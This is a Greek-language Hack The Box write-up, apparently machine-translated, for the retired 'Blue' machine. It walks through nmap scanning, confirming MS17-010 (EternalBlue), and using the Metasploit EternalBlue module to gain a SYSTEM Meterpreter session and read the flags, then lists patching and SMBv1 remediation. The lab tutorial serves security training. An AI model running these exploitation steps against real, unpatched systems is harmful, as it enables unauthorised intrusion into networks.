Κρατήστε ήρεμο και χαράξτε το κουτί - Μπλε

Το Hack The Box (HTB) είναι μια διαδικτυακή πλατφόρμα που σας επιτρέπει να δοκιμάσετε τις δοκιμές διείσδυσης.

Περιέχει πολλές προκλήσεις που ενημερώνονται συνεχώς. Μερικά από αυτά προσομοιώνουν σενάρια πραγματικού κόσμου και μερικά από αυτά κλίνουν περισσότερο προς ένα στυλ πρόκλησης CTF.

Σημείωση : Επιτρέπονται μόνο εγγραφές συνταξιούχων μηχανών HTB.

Το Blue είναι ένα από τα πιο απλά μηχανήματα στο Hack The Box. Ωστόσο, καταδεικνύει τον αντίκτυπο του EternalBlue exploit, το οποίο έχει χρησιμοποιηθεί για συμβιβασμούς εταιρειών μέσω επιθέσεων μεγάλης κλίμακας ransomware και crypto-mining.

Θα χρησιμοποιήσουμε τα ακόλουθα εργαλεία για να ετοιμάσουμε το πλαίσιο σε ένα πλαίσιο Kali Linux:

  • χάρτης
  • searchsploit
  • metasploit
  • μετρητής

Ας αρχίσουμε.

Πρώτα, προσθέτω το μπλε στο αρχείο / etc / hosts.

nano /etc/hosts

με

10.10.10.40 blue.htb

Βήμα 1 - Αναγνώριση

Το πρώτο βήμα πριν από την εκμετάλλευση ενός μηχανήματος είναι να κάνετε λίγη σάρωση και αναγνώριση.

Αυτό είναι ένα από τα πιο σημαντικά μέρη, καθώς θα καθορίσει τι μπορείτε να προσπαθήσετε να εκμεταλλευτείτε αργότερα. Είναι πάντα καλύτερο να αφιερώνετε περισσότερο χρόνο σε αυτήν τη φάση για να λαμβάνετε όσο το δυνατόν περισσότερες πληροφορίες.

Σάρωση θύρας

Θα χρησιμοποιήσω το Nmap (Network Mapper). Το Nmap είναι ένα δωρεάν και ανοιχτού κώδικα βοηθητικό πρόγραμμα για ανακάλυψη δικτύου και έλεγχο ασφαλείας.

Χρησιμοποιεί πρωτογενή πακέτα IP για να προσδιορίσει ποιοι κεντρικοί υπολογιστές είναι διαθέσιμοι στο δίκτυο, ποιες υπηρεσίες προσφέρουν αυτοί οι κεντρικοί υπολογιστές, ποια λειτουργικά συστήματα εκτελούν, τι είδους φίλτρα πακέτων / τείχη προστασίας χρησιμοποιούνται και δεκάδες άλλα χαρακτηριστικά.

Υπάρχουν πολλές εντολές που μπορείτε να χρησιμοποιήσετε με αυτό το εργαλείο για σάρωση του δικτύου. Αν θέλετε να μάθετε περισσότερα για αυτό, μπορείτε να ρίξετε μια ματιά στην τεκμηρίωση εδώ.

Χρησιμοποιώ την ακόλουθη εντολή για να εκτελέσω μια εντατική σάρωση:

nmap -A -v blue.htb

-A: Ενεργοποιεί την ανίχνευση λειτουργικού συστήματος, την ανίχνευση έκδοσης, τη σάρωση σεναρίων και το traceroute

-v: Αυξάνει το επίπεδο λεκτικότητας

blue .htb: όνομα κεντρικού υπολογιστή για το μπλε πλαίσιο

Εάν βρείτε τα αποτελέσματα λίγο υπερβολικά, μπορείτε να το δοκιμάσετε:

nmap blue.htb

Μπορούμε να δούμε ότι υπάρχουν αρκετά ανοιχτά λιμάνια, όπως:

Port 445, Microsoft-DS (Υπηρεσίες καταλόγου) κοινή χρήση αρχείων SMB

Από τη σάρωση nmap, έχουμε κάποιες πληροφορίες σχετικά με το όνομα του υπολογιστή (haris-PC) και την έκδοση SMB (2.02).

Το Server Message Block (SMB) είναι ένα πρωτόκολλο δικτύου που επιτρέπει στους χρήστες να επικοινωνούν με απομακρυσμένους υπολογιστές και διακομιστές προκειμένου να χρησιμοποιούν τους πόρους τους ή να μοιράζονται, να ανοίγουν και να επεξεργάζονται αρχεία.

Από το όνομα αυτού του πλαισίου και ότι είναι ένα μηχάνημα Windows με ανοιχτή τη θύρα 445, μπορούμε να υποθέσουμε ότι το μηχάνημα είναι ευάλωτο στο EternalBlue. Χρησιμοποιώ ένα σενάριο nmap για να επαληθεύσω αυτές τις πληροφορίες με τα εξής:

nmap --script vuln -p 445 blue.htb

Μπορούμε να δούμε ότι το πλαίσιο είναι ευάλωτο σε μια ευπάθεια απομακρυσμένης εκτέλεσης κώδικα σε διακομιστές Microsoft SMBv1 (ms17-010).

Βήμα 2 - Κατανόηση ms17-010

Τι είναι το ms17-010;

Το EternalBlue είναι μια εκμετάλλευση επίθεσης στον κυβερνοχώρο που αναπτύχθηκε από την Εθνική Υπηρεσία Ασφαλείας των ΗΠΑ (NSA). Είχε διαρρεύσει από την ομάδα χάκερ Shadow Brokers στις 14 Απριλίου 2017, ένα μήνα αφότου η Microsoft κυκλοφόρησε ενημερώσεις κώδικα για την ευπάθεια - Wikipedia

Μπορείτε να διαβάσετε περισσότερα εδώ. Αυτή η ευπάθεια επιδιορθώθηκε και αναφέρεται στο ενημερωτικό δελτίο ασφαλείας της Microsoft ως MS17-010.

Το EternalBlue επιτρέπει στους χάκερ να εκτελούν εξ αποστάσεως αυθαίρετο κώδικα για να αποκτήσουν πρόσβαση σε ένα δίκτυο. Εκμεταλλεύεται μια ευπάθεια στο πρωτόκολλο SMB των Windows OS. Το exploit μπορεί να θέσει σε κίνδυνο ολόκληρο το δίκτυο και τις συσκευές που είναι συνδεδεμένες σε αυτό.

Το κακόβουλο λογισμικό που χρησιμοποιεί το EternalBlue μπορεί να εξαπλωθεί σε δίκτυα. Το 2017, το WannaCry - ένα crypto-ransomware - χρησιμοποίησε το EternalBlue exploit που εξαπλώθηκε σε όλο το δίκτυο μολύνοντας όλες τις συνδεδεμένες συσκευές.

Βήμα 3 - Εκμετάλλευση του EternalBlue

Χρησιμοποιώ το Searchsploit για να ελέγξω εάν υπάρχει κάποιο γνωστό exploit. Το Searchsploit είναι ένα εργαλείο αναζήτησης γραμμής εντολών για Exploit Database.

Χρησιμοποιώ την ακόλουθη εντολή:

searchsploit eternalblue

Μπορώ να λάβω περισσότερες λεπτομέρειες σχετικά με ένα exploit με:

searchsploit -x 41738.py

Μπορείτε επίσης να ελέγξετε τη βάση δεδομένων Exploit για να βρείτε το exploit.

Υπάρχει μια μονάδα Metasploit διαθέσιμη.

Θα χρησιμοποιήσουμε το Metasploit , το οποίο είναι ένα πλαίσιο δοκιμών διείσδυσης που κάνει το hacking απλό. Είναι ένα ουσιαστικό εργαλείο για πολλούς επιτιθέμενους και υπερασπιστές.

Ξεκινώ το Metasploit Framework στο Kali και ψάχνω την εντολή που πρέπει να χρησιμοποιήσω για το exploit.

Μην ξεχάσετε να ενημερώσετε το Metasploit όταν το ξεκινάτε με αυτήν την εντολή:

msfupdate

Μπορείτε επίσης να ελέγξετε αν ο στόχος είναι ευάλωτος στο EternalBlue στο Metasploit χρησιμοποιώντας βοηθητικό. Ξεκινήστε με αυτήν την εντολή:

search eternalblue

τότε σε αυτή την περίπτωση

use 1

επέλεξε

auxiliary/scanner/smb/smb_ms17_010

Μπορείτε να ελέγξετε τις επιλογές με

show options

και ρυθμίστε το RHOSTS με

set RHOSTS blue.htb

Στη συνέχεια, εκτελέστε το βοηθητικό με

run

Μπορείτε να δείτε ότι ο κεντρικός υπολογιστής είναι πιθανό να είναι ευάλωτος στο MS17-010!

Ας δούμε τώρα το exploit με

use 2

ή την εντολή

exploit/windows/smb/ms17_010_eternalblue

Πρέπει να ρυθμίσουμε τις επιλογές για RHOSTS

και LHOST - το δικό μου ήταν 10.10.14.24. Θα πρέπει να το ρυθμίσετε με το δικό σας LHOST. Μπορείτε να ελέγξετε τη δική σας εδώ.

Πριν εκτελέσετε το exploit, μπορείτε να ελέγξετε εδώ εάν το μηχάνημα είναι ευάλωτο - αυτό θα εκτελέσει το βοηθητικό που χρησιμοποιήσαμε νωρίτερα με την εντολή

check

Τότε τρέχω το exploit με

run

Το exploit έπρεπε να τρέξει αρκετές φορές πριν έχω μια συνεδρία Meterpreter .

Εδώ είναι ο ορισμός του Meterpreter από την επιθετική ασφάλεια:

Το Meterpreter είναι ένα προηγμένο, δυναμικά επεκτάσιμο ωφέλιμο φορτίο που χρησιμοποιεί στάδια έγχυσης DLL στη μνήμη και επεκτείνεται μέσω του δικτύου κατά το χρόνο εκτέλεσης. Επικοινωνεί μέσω του stager και παρέχει ένα ολοκληρωμένο Ruby API από την πλευρά του πελάτη. Διαθέτει ιστορικό εντολών, ολοκλήρωση καρτελών, κανάλια και άλλα.

Μπορείτε να διαβάσετε περισσότερα για το Meterpreter εδώ.

Ας ξεκινήσουμε συγκεντρώνοντας μερικές πληροφορίες.

Το getuid επιστρέφει το πραγματικό αναγνωριστικό χρήστη της διαδικασίας κλήσης.

Ο λογαριασμός NT Authority \ SYSTEM ή LocalSystem είναι ένας ενσωματωμένος λογαριασμός Windows. Είναι ο πιο ισχυρός λογαριασμός σε τοπική παρουσία των Windows. Έχουμε πρόσβαση διαχειριστή σε αυτό το μηχάνημα.

Βήμα 4 - Αναζητώντας τη σημαία user.txt

Θα μεταβείτε στο haris φάκελο από Documents and Settings .

Μπορώ να παραθέσω όλα τα αρχεία / φακέλους με την ακόλουθη εντολή:

ls -la

Στη συνέχεια μετακομίζω στην επιφάνεια εργασίας με

cd Desktop

Και βρίσκω τη σημαία χρήστη! Μπορώ να ελέγξω τα περιεχόμενα του αρχείου με

cat user.txt

Βήμα 5 - Αναζητώντας τη σημαία root.txt

Ας βρούμε τη ριζική σημαία τώρα. Πλοηγώ μέχρι τους χρήστες και κάνω check in στο φάκελο Administrator / Desktop . Βρίσκω τη σημαία!

Χρησιμοποιώ την ακόλουθη εντολή για να δω το περιεχόμενο του αρχείου:

cat root.txt

Συγχαρητήρια! Βρήκατε και τις δύο σημαίες.

Επιδιορθώσεις

  • Επιδιορθώστε τις συσκευές σας με την ενημερωμένη έκδοση ασφαλείας για Microsoft Windows SMB v1. Μπορείτε να ελέγξετε το Microsoft Security Bulletin για να δείτε ποια OS επηρεάζονται
  • Απενεργοποιήστε το SMB v1 και χρησιμοποιήστε το SMB v2 ή v3
  • Εφαρμόστε την αρχή του λιγότερο προνομίου σε όλα τα συστήματα και τις υπηρεσίες σας

Μην διστάσετε να σχολιάσετε, να κάνετε ερωτήσεις ή να μοιραστείτε με τους φίλους σας :)

Μπορείτε να δείτε περισσότερα άρθρα από τη σειρά Keep Calm and Hack the Box εδώ.

Μπορείτε να με ακολουθήσετε στο Twitter ή στο LinkedIn.

Και μην ξεχάσετε να # GetSecure , # BeSecure & # StaySecure !